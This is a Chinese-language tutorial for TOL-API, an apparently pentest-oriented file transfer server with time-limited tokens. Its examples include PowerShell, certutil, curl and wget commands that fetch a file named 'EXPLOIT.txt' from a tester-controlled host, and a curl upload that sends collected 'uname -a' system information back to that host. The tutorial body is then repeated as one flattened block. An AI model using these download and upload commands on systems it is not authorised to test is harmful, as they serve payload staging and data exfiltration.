TOL-API 基于Token验证文件传输API安全工具
字数 965 2025-09-23 19:27:46

TOL-API 基于Token验证的文件传输API安全工具 - 详细教学文档

1. 工具概述

TOL-API是一个基于Token验证的文件传输API安全工具,主要用于安全地上传和下载文件。它通过时间限制的Token机制防止任意文件下载问题,适合在渗透测试和安全评估中使用。

2. 安装与配置

2.1 安装依赖

$ pip install -r requirements.txt

2.2 运行工具

$ python tolapi.py

运行后会生成一个Auth-Code作为身份验证凭证,默认监听地址为:

http://127.0.0.1:5000

3. 控制面板功能

控制面板分为两大功能区域:

  1. 上传区块
  2. 下载区块

4. 下载API使用

4.1 操作步骤

  1. 勾选需要下载的文件
  2. 设置有效下载时间(如60秒)
  3. 系统自动生成对应的Shell下载命令

4.2 生成的下载命令示例

PowerShell命令

powershell -c "Invoke-WebRequest -Uri 'http://192.168.206.128:5000/download_with_token/7b4b5f39c1274d1fa2b310cd0f6ae371' -OutFile 'EXPLOIT.txt'"

certutil命令

certutil -urlcache -split -f "http://192.168.206.128:5000/download_with_token/7b4b5f39c1274d1fa2b310cd0f6ae371" "EXPLOIT.txt"

curl命令

curl -o "EXPLOIT.txt" "http://192.168.206.128:5000/download_with_token/7b4b5f39c1274d1fa2b310cd0f6ae371"

wget命令

wget -O "EXPLOIT.txt" "http://192.168.206.128:5000/download_with_token/7b4b5f39c1274d1fa2b310cd0f6ae371"

4.3 注意事项

  • Token在有效期内才能成功下载
  • 过期后会返回403 Forbidden错误

5. 上传API使用

5.1 操作示例

  1. 创建要上传的文件
$ uname -a > /tmp/sys.info
  1. 使用curl上传
$ curl -X POST -F "file=@/tmp/sys.info" "http://192.168.206.128:5000/upload_with_token/38e435f8a45f4181b23b34057f550768"
  1. 返回下载页面刷新即可看到已上传的文件

5.2 参数说明

  • -X POST: 指定POST方法
  • -F "file=@/path/to/file": 指定要上传的文件路径
  • URL中的Token参数必须有效

6. 安全机制

  1. Token验证: 所有上传下载操作都需要有效Token
  2. 时间限制: Token具有时效性,过期失效
  3. 访问控制: 无效请求返回403 Forbidden

7. 应用场景

  1. 渗透测试中的文件传输
  2. 安全评估中的数据收集
  3. 受限环境下的文件交换
  4. 需要审计的文件传输操作

8. 注意事项

  1. 确保Token在有效期内使用
  2. 上传下载操作会被记录,适合需要审计的场景
  3. 默认监听所有网络接口,生产环境应考虑防火墙规则
  4. 工具源代码可在GitHub获取: https://github.com/MartinxMax/tolapi

9. 故障排除

  1. 403错误: 检查Token是否过期或无效
  2. 连接失败: 检查服务是否运行,端口是否开放
  3. 上传失败: 检查文件路径是否正确,权限是否足够

10. 高级配置

如需修改默认配置,可编辑源代码中的以下参数:

  • 监听端口
  • Token有效期
  • 文件存储路径
  • 认证机制

通过合理配置这些参数,可以适应不同的安全需求和网络环境。

TOL-API 基于Token验证的文件传输API安全工具 - 详细教学文档 1. 工具概述 TOL-API是一个基于Token验证的文件传输API安全工具,主要用于安全地上传和下载文件。它通过时间限制的Token机制防止任意文件下载问题,适合在渗透测试和安全评估中使用。 2. 安装与配置 2.1 安装依赖 2.2 运行工具 运行后会生成一个Auth-Code作为身份验证凭证,默认监听地址为: 3. 控制面板功能 控制面板分为两大功能区域: 上传区块 下载区块 4. 下载API使用 4.1 操作步骤 勾选需要下载的文件 设置有效下载时间(如60秒) 系统自动生成对应的Shell下载命令 4.2 生成的下载命令示例 PowerShell命令 certutil命令 curl命令 wget命令 4.3 注意事项 Token在有效期内才能成功下载 过期后会返回403 Forbidden错误 5. 上传API使用 5.1 操作示例 创建要上传的文件 使用curl上传 返回下载页面刷新即可看到已上传的文件 5.2 参数说明 -X POST : 指定POST方法 -F "file=@/path/to/file" : 指定要上传的文件路径 URL中的Token参数必须有效 6. 安全机制 Token验证 : 所有上传下载操作都需要有效Token 时间限制 : Token具有时效性,过期失效 访问控制 : 无效请求返回403 Forbidden 7. 应用场景 渗透测试中的文件传输 安全评估中的数据收集 受限环境下的文件交换 需要审计的文件传输操作 8. 注意事项 确保Token在有效期内使用 上传下载操作会被记录,适合需要审计的场景 默认监听所有网络接口,生产环境应考虑防火墙规则 工具源代码可在GitHub获取: https://github.com/MartinxMax/tolapi 9. 故障排除 403错误 : 检查Token是否过期或无效 连接失败 : 检查服务是否运行,端口是否开放 上传失败 : 检查文件路径是否正确,权限是否足够 10. 高级配置 如需修改默认配置,可编辑源代码中的以下参数: 监听端口 Token有效期 文件存储路径 认证机制 通过合理配置这些参数,可以适应不同的安全需求和网络环境。